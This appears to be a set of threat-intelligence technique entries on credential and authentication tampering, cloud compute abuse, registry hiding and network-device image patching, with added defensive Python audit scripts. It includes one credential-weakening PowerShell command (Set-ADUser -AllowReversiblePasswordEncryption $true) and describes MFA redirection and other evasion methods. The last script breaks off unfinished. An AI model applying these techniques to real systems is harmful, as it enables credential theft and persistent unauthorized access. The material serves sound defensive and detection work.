By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the AzureADConnectAuthenticationAgentService process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.<sup>[[Azure AD Connect for Read Teamers](https://app.tidalcyber.com/references/0b9946ff-8c1c-4d93-8401-e1e4dd186305)]</sup><sup>[[AADInternals Azure AD On-Prem to Cloud](https://app.tidalcyber.com/references/7a6a7ecd-b9c7-4371-9924-34733597556c)]</sup> In environments using AD FS, an adversary may edit the Microsoft.IdentityServer.Servicehost configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.<sup>[[MagicWeb](https://app.tidalcyber.com/references/5b728693-37e8-4100-ac82-b70945113e07)]</sup>

In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.<sup>[[Mandiant Azure AD Backdoors](https://app.tidalcyber.com/references/7b4502ff-a45c-4ba7-b00e-ca9f6e9c2ac8)]</sup>

The tag is: misp-galaxy:technique="Hybrid Identity"

Multi-Factor Authentication

Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.

Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://app.tidalcyber.com/technique/c0f2efd4-bfc8-43da-9859-14446fb8f289), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.<sup>[[Mandiant APT42](https://app.tidalcyber.com/references/10b3e476-a0c5-41fd-8cb8-5bfb245b118f)]</sup><sup>[[Azure AD Conditional Access Exclusions](https://app.tidalcyber.com/references/8cfb45ec-b660-4a3a-9175-af4ea01ef473)]</sup>

For example, modifying the Windows hosts file (C:\windows\system32\drivers\etc\hosts) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. <sup>[[Russians Exploit Default MFA Protocol - CISA March 2022](https://app.tidalcyber.com/references/00c6ff88-6eeb-486d-ae69-dffd5aebafe6)]</sup>

Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim’s network environment.<sup>[[Russians Exploit Default MFA Protocol - CISA March 2022](https://app.tidalcyber.com/references/00c6ff88-6eeb-486d-ae69-dffd5aebafe6)]</sup>

The tag is: misp-galaxy:technique="Multi-Factor Authentication"
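The hosts-file variant in the Multi-Factor Authentication entry above (redirecting the MFA server name to localhost so a fail-open policy lets logons through) leaves a simple, auditable trace on the host. The following is an added example, not code from the MISP or Tidal Cyber projects: it parses a hosts file and reports every non-localhost name that has been mapped to a loopback or unspecified address, then narrows that to the hostnames of the organisation's MFA and RADIUS endpoints. The hosts content and the endpoint list are constructed for the example; the Windows path the entry cites is where such a file lives in practice.

```python
from __future__ import annotations
import ipaddress

# Constructed hosts file for the example (not taken from any incident).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.corp.example
127.0.0.1       mfa-auth.corp.example   # MFA calls now terminate on the box itself
0.0.0.0         radius01.corp.example
"""

# Names that legitimately resolve to loopback and must not be flagged.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain",
                  "ip6-localhost", "ip6-loopback", "broadcasthost"}

# Assumed list of the organisation's MFA-related endpoints (constructed).
MFA_ENDPOINTS = {"mfa-auth.corp.example", "radius01.corp.example"}


def parse_hosts(text: str) -> list[tuple[int, ipaddress._BaseAddress, str]]:
    """Yield (line number, address, hostname) for every mapping in a hosts file."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line; a hardened scanner would log it
        for host in fields[1:]:
            entries.append((lineno, addr, host.lower()))
    return entries


def sinkholed_names(text: str) -> list[dict]:
    """Non-localhost names mapped to loopback (127/8, ::1) or 0.0.0.0 / ::."""
    hits = []
    for lineno, addr, host in parse_hosts(text):
        if host in LOOPBACK_NAMES:
            continue
        if addr.is_loopback or addr.is_unspecified:
            hits.append({"line": lineno, "host": host, "address": str(addr)})
    return hits


def mfa_sinkholed(text: str, endpoints: set[str] = MFA_ENDPOINTS) -> list[dict]:
    """Subset of sinkholed names that belong to the MFA/RADIUS endpoint list."""
    watched = {e.lower() for e in endpoints}
    return [h for h in sinkholed_names(text) if h["host"] in watched]


if __name__ == "__main__":
    for hit in mfa_sinkholed(SAMPLE_HOSTS):
        print(f"line {hit['line']}: {hit['host']} -> {hit['address']}")
```

Run it against `C:\windows\system32\drivers\etc\hosts` (or `/etc/hosts` for agents on Linux) from an integrity-monitoring job; the more durable control is the one the cited CISA advisory implies, which is to make sure the MFA integration fails closed, so a redirected name produces a denied logon rather than a silent bypass.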

Network Device Authentication

Adversaries may use [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) to hard code a password in the operating system, thus bypassing native authentication mechanisms for local accounts on network devices.

[Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) may include code implanted in the operating system of network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check whether the user input is that password. If so, access is granted. Otherwise, the implanted code passes the credentials on to the normal verification path, where they may still be valid.<sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup>

The tag is: misp-galaxy:technique="Network Device Authentication"

Network Provider DLL

Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.<sup>[[Network Provider API](https://app.tidalcyber.com/references/b218434e-4233-5963-824e-50ee32d468ed)]</sup> During the logon process, Winlogon (the interactive logon module) sends credentials to the local mpnotify.exe process via RPC. The mpnotify.exe process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.<sup>[[NPPSPY - Huntress](https://app.tidalcyber.com/references/df1f7379-38c3-5ca9-8333-d684022c000c)]</sup><sup>[[NPPSPY Video](https://app.tidalcyber.com/references/6533d5df-7388-5c59-8c63-0923de34b61d)]</sup><sup>[[NPLogonNotify](https://app.tidalcyber.com/references/1fda833e-e543-5e68-a0f5-8a4170dd632a)]</sup>

Adversaries can configure a malicious network provider DLL to receive credentials from mpnotify.exe.<sup>[[NPPSPY](https://app.tidalcyber.com/references/c12bfaf6-4d83-552e-912b-cc55bce85961)]</sup> Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the NPLogonNotify() function.<sup>[[NPLogonNotify](https://app.tidalcyber.com/references/1fda833e-e543-5e68-a0f5-8a4170dd632a)]</sup>

Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.<sup>[[NPPSPY - Huntress](https://app.tidalcyber.com/references/df1f7379-38c3-5ca9-8333-d684022c000c)]</sup>

The tag is: misp-galaxy:technique="Network Provider DLL"

Password Filter DLL

Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.<sup>[[Carnal Ownage Password Filters Sept 2013](https://app.tidalcyber.com/references/78ed9074-a46c-4ce6-ab7d-a587bd585dc5)]</sup>

The tag is: misp-galaxy:technique="Password Filter DLL"

Pluggable Authentication Modules

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.<sup>[[Apple PAM](https://app.tidalcyber.com/references/4838a58e-c00d-4b4c-937d-8da5d9f1a4b5)]</sup><sup>[[Man Pam_Unix](https://app.tidalcyber.com/references/6bc5ad93-3cc2-4429-ac4c-aae72193df27)]</sup><sup>[[Red Hat PAM](https://app.tidalcyber.com/references/3dc88605-64c8-495a-9e3b-e5686fd2eb03)]</sup>

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.<sup>[[PAM Backdoor](https://app.tidalcyber.com/references/da1ffaf1-39f9-4516-8c04-4a4301e13585)]</sup>

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, because the values exchanged with PAM components may be plain-text, as PAM does not store passwords.<sup>[[PAM Creds](https://app.tidalcyber.com/references/aa9d5bdd-2102-4322-8736-56db8e083fc0)]</sup><sup>[[Apple PAM](https://app.tidalcyber.com/references/4838a58e-c00d-4b4c-937d-8da5d9f1a4b5)]</sup>

The tag is: misp-galaxy:technique="Pluggable Authentication Modules"

Reversible Encryption

An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.<sup>[[store_pwd_rev_enc](https://app.tidalcyber.com/references/d3b9df24-b776-4658-9bb4-f43a2fe0094c)]</sup>

If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:

  1. Encrypted password (<code>G$RADIUSCHAP</code>) from the Active Directory user-structure <code>userParameters</code>

  2. 16 byte randomly-generated value (<code>G$RADIUSCHAPKEY</code>) also from <code>userParameters</code>

  3. Global LSA secret (<code>G$MSRADIUSCHAPKEY</code>)

  4. Static key hardcoded in the Remote Access Subauthentication DLL (<code>RASSFM.DLL</code>)

With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.<sup>[[how_pwd_rev_enc_1](https://app.tidalcyber.com/references/180246ca-94d8-4c78-894d-ae3b6fad3257)]</sup><sup>[[how_pwd_rev_enc_2](https://app.tidalcyber.com/references/cc08f190-5c17-441c-a6fa-99f8fdb8d1ae)]</sup>

An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) module. For example, an adversary may implement and apply an FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.<sup>[[dump_pwd_dcsync](https://app.tidalcyber.com/references/bd1d7e75-feee-47fd-abfb-7e3dfc648a72)]</sup> In PowerShell, an adversary may make associated changes to user settings using commands similar to <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code>.

The tag is: misp-galaxy:technique="Reversible Encryption"
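Because the Reversible Encryption entry above names both scopes at which the setting can be turned on (per user, and via a Fine-Grained Password Policy), an audit has to look in two places. The following is an added example, not code from the MISP or Tidal Cyber projects: it parses a small ldifde-style export and reports user objects whose <code>userAccountControl</code> carries the ENCRYPTED_TEXT_PWD_ALLOWED bit (0x0080, the bit that <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code> sets) together with any Password Settings Object whose <code>msDS-PasswordReversibleEncryptionEnabled</code> attribute is TRUE. The export text and every account name in it are constructed for the example.

```python
from __future__ import annotations

# userAccountControl flag ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: when set, the
# DC keeps an RC4-reversible form of the password alongside the one-way hash.
ENCRYPTED_TEXT_PWD_ALLOWED = 0x0080

# Constructed ldifde-style export of three users and one PSO (not real data).
# 512 = NORMAL_ACCOUNT, 640 = 512 | 0x80, 66048 = 512 | DONT_EXPIRE_PASSWORD.
SAMPLE_LDIF = """\
dn: CN=alice,CN=Users,DC=corp,DC=example
objectClass: user
sAMAccountName: alice
userAccountControl: 512

dn: CN=svc-legacy,CN=Users,DC=corp,DC=example
objectClass: user
sAMAccountName: svc-legacy
userAccountControl: 640

dn: CN=bob,CN=Users,DC=corp,DC=example
objectClass: user
sAMAccountName: bob
userAccountControl: 66048

dn: CN=PSO-Legacy,CN=Password Settings Container,CN=System,DC=corp,DC=example
objectClass: msDS-PasswordSettings
msDS-PasswordReversibleEncryptionEnabled: TRUE
msDS-PSOAppliesTo: CN=LegacyApps,CN=Users,DC=corp,DC=example
"""


def parse_ldif(text: str) -> list[dict[str, list[str]]]:
    """Minimal LDIF reader: records are blank-line separated, attributes may repeat."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")  # split on the first colon only
        current.setdefault(key.strip(), []).append(value.strip())
    if current:
        records.append(current)
    return records


def users_with_reversible_encryption(records: list[dict]) -> list[str]:
    """sAMAccountNames whose userAccountControl has the 0x80 bit set."""
    hits = []
    for r in records:
        if "user" in r.get("objectClass", []) and "userAccountControl" in r:
            uac = int(r["userAccountControl"][0])
            if uac & ENCRYPTED_TEXT_PWD_ALLOWED:
                hits.append(r["sAMAccountName"][0])
    return hits


def psos_with_reversible_encryption(records: list[dict]) -> list[tuple[str, list[str]]]:
    """(PSO dn, msDS-PSOAppliesTo targets) for every PSO that enables reversible storage."""
    hits = []
    for r in records:
        if "msDS-PasswordSettings" not in r.get("objectClass", []):
            continue
        flag = r.get("msDS-PasswordReversibleEncryptionEnabled", ["FALSE"])[0]
        if flag.upper() == "TRUE":
            hits.append((r["dn"][0], r.get("msDS-PSOAppliesTo", [])))
    return hits


if __name__ == "__main__":
    recs = parse_ldif(SAMPLE_LDIF)
    print("users:", users_with_reversible_encryption(recs))
    for dn, targets in psos_with_reversible_encryption(recs):
        print("PSO:", dn, "->", targets)
```

A real export would come from `ldifde` or an LDAP search scoped to `userAccountControl:1.2.840.113556.1.4.803:=128` and to the Password Settings Container; the domain-wide Default Domain Policy setting is a third place to check and is not covered by this snippet.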

Modify Authentication Process

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).

Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

The tag is: misp-galaxy:technique="Modify Authentication Process"

Create Cloud Instance

An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://app.tidalcyber.com/technique/bcaf63dc-660a-40d4-ba28-fc113b34bf51) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://app.tidalcyber.com/technique/c0e4f97b-f651-493f-9636-6ac2f6fb46fb) or for Remote Data Staging.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.

The tag is: misp-galaxy:technique="Create Cloud Instance"

Create Snapshot

An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://app.tidalcyber.com/technique/d1836637-e61d-42bb-9067-b325a201b7c7) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.

An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

The tag is: misp-galaxy:technique="Create Snapshot"

Delete Cloud Instance

An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.

An adversary may also [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and later terminate the instance after achieving their objectives.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

The tag is: misp-galaxy:technique="Delete Cloud Instance"

Modify Cloud Compute Configurations

Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.

For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f) without raising suspicion by using up a victim’s entire quota.<sup>[[Microsoft Cryptojacking 2023](https://app.tidalcyber.com/references/e2dbc963-b913-5a44-bb61-88a3f0d8d8a3)]</sup> Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.<sup>[[Microsoft Azure Policy](https://app.tidalcyber.com/references/761d102e-768a-5536-a098-0b1819029d33)]</sup>

Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://app.tidalcyber.com/technique/edf9f7d7-bc14-4e25-800d-f508acb580d4). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.<sup>[[Microsoft Peach Sandstorm 2023](https://app.tidalcyber.com/references/84d026ed-b8f2-5bbb-865a-2d93aa4b2ef8)]</sup> This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.<sup>[[Microsoft Azure Policy](https://app.tidalcyber.com/references/761d102e-768a-5536-a098-0b1819029d33)]</sup> <sup>[[Microsoft Subscription Hijacking 2022](https://app.tidalcyber.com/references/e5944e4c-76c6-55d1-97ec-8367b7f98c28)]</sup>

The tag is: misp-galaxy:technique="Modify Cloud Compute Configurations"

Revert Cloud Instance

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.<sup>[[Tech Republic - Restore AWS Snapshots](https://app.tidalcyber.com/references/bfe848a3-c855-4bca-a6ea-44804d48c7eb)]</sup><sup>[[Google - Restore Cloud Snapshot](https://app.tidalcyber.com/references/ffa46676-518e-4fef-965d-e91efae95dfc)]</sup>

The tag is: misp-galaxy:technique="Revert Cloud Instance"

Modify Cloud Compute Infrastructure

An adversary may attempt to modify a cloud account’s compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.

Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

The tag is: misp-galaxy:technique="Modify Cloud Compute Infrastructure"

Modify Registry

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) may be used for local or remote Registry modification. <sup>[[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]</sup> Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) or other utilities using the Win32 API. <sup>[[Microsoft Reghide NOV 2006](https://app.tidalcyber.com/references/42503ec7-f5da-4116-a3b3-a1b18a66eed3)]</sup> Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. <sup>[[TrendMicro POWELIKS AUG 2014](https://app.tidalcyber.com/references/4a42df15-4d09-4f4f-8333-2b41356fdb80)]</sup> <sup>[[SpectorOps Hiding Reg Jul 2017](https://app.tidalcyber.com/references/877a5ae4-ec5f-4f53-b69d-ba74ff9e1619)]</sup>

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. <sup>[[Microsoft Remote](https://app.tidalcyber.com/references/331d59e3-ce7f-483c-b77d-001c8a9ae1df)]</sup> Often [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are required, along with access to the remote system’s [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) for RPC communication.

The tag is: misp-galaxy:technique="Modify Registry"
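The pseudo-hidden key described above works because Win32-based tools hand the key name around as a NUL-terminated string, so a name that begins with a NUL reads as empty and one with a NUL in the middle is cut short. The check below makes that discrepancy explicit so an analyst can flag such names in an inventory. It is an added example, not MISP or Tidal Cyber code; the entries are constructed rather than read from a live Registry (a real scan on Windows would enumerate names through the native NT API, which returns counted strings, and is outside this example).

```python
"""Flag Registry key/value names containing an embedded NUL, which a
NUL-terminated (Win32) read would truncate or hide entirely.
Added example (not MISP/Tidal Cyber code); entries below are constructed."""

# Constructed sample entries (path, name) as a counted-string API would return them.
SAMPLE_ENTRIES = [
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "OneDrive"),
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "\x00Updater"),
    ("HKCU\\Software\\Classes\\CLSID\\{constructed-example-clsid}", "Config\x00hidden"),
    ("HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time", "ImagePath"),
]


def win32_view(name):
    """What a tool that reads the name as a NUL-terminated C string would see."""
    nul = name.find("\x00")
    return name if nul < 0 else name[:nul]


def find_hidden(entries):
    """Return (path, escaped_name, what_win32_shows) for every name that a
    NUL-terminated read would truncate; an empty third field means the name
    is invisible to such tools."""
    findings = []
    for path, name in entries:
        shown = win32_view(name)
        if shown != name:
            escaped = name.encode("unicode_escape").decode("ascii")
            findings.append((path, escaped, shown))
    return findings


if __name__ == "__main__":
    for path, escaped, shown in find_hidden(SAMPLE_ENTRIES):
        print(f"{path}\\{escaped}  (Win32 tools show: {shown!r})")
```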

Downgrade System Image

Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

On embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.

Downgrading the system image to an older version may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://app.tidalcyber.com/technique/8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f).

The tag is: misp-galaxy:technique="Downgrade System Image"

Patch System Image

Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.<sup>[[Killing the myth of Cisco IOS rootkits](https://app.tidalcyber.com/references/538070d6-fbdb-4cc9-8ddf-c331e4375cfb)]</sup> <sup>[[Killing IOS diversity myth](https://app.tidalcyber.com/references/19d7ccc6-76ed-4b12-af50-f810fbc22037)]</sup> <sup>[[Cisco IOS Shellcode](https://app.tidalcyber.com/references/55a45f9b-7be4-4f1b-8b19-a0addf9da8d8)]</sup> <sup>[[Cisco IOS Forensics Developments](https://app.tidalcyber.com/references/95fdf251-f40d-4f7a-bb12-8762e9c961b9)]</sup> <sup>[[Juniper Netscreen of the Dead](https://app.tidalcyber.com/references/3b87bd85-c6dd-4bd9-9427-33b5bd84db4a)]</sup> Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.

To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.

To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.

In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.

By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://app.tidalcyber.com/technique/8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4), authentication, via [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094), and perimeter defenses, via [Network Boundary Bridging](https://app.tidalcyber.com/technique/091282d8-ef05-487f-93aa-445efaeed71b). Adding new capabilities for the adversary’s purpose include [Keylogging](https://app.tidalcyber.com/technique/7f1798b5-b159-441b-a5ef-3b5c706e1699), [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400), and [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3).

Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://app.tidalcyber.com/technique/49e3504a-e031-45a0-b816-1d3741a78c7f), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade.

When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://app.tidalcyber.com/technique/6f2186f3-c798-46e8-a26f-ae033822837b).

When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) to achieve persistence.

The tag is: misp-galaxy:technique="Patch System Image"
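Both the Downgrade System Image and Patch System Image entries above end with the same defensive consequence: the version a device reports cannot be trusted on its own, because the version command itself may be patched. The baseline check below therefore compares both the reported version and a hash of the stored image file against a known-good inventory. It is an added example, not MISP or Tidal Cyber code; the device names, version strings and image bytes are constructed, and the version parser handles IOS-style strings such as `15.2(4)M7` as an assumption about the format.

```python
"""Baseline check for network device images: flag a reported version lower
than the baseline (downgrade) and an image hash that differs from the
known-good file (patched or replaced image).
Added example (not MISP/Tidal Cyber code); inventory and bytes are constructed."""
import hashlib
import re


def version_key(v):
    """Split an IOS-style version such as '15.2(4)M7' into comparable parts:
    numeric runs compare as integers, letter runs compare lexically."""
    parts = re.findall(r"\d+|[A-Za-z]+", v)
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in parts)


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# Constructed image contents; hashes below are of these bytes, not of any real image.
GOOD_IMAGE = b"constructed-image-15.2(4)M7"
OLD_IMAGE = b"constructed-image-15.1(4)M12a"
PATCHED_IMAGE = GOOD_IMAGE + b"-tampered-section"

# Known-good inventory, normally exported from change management.
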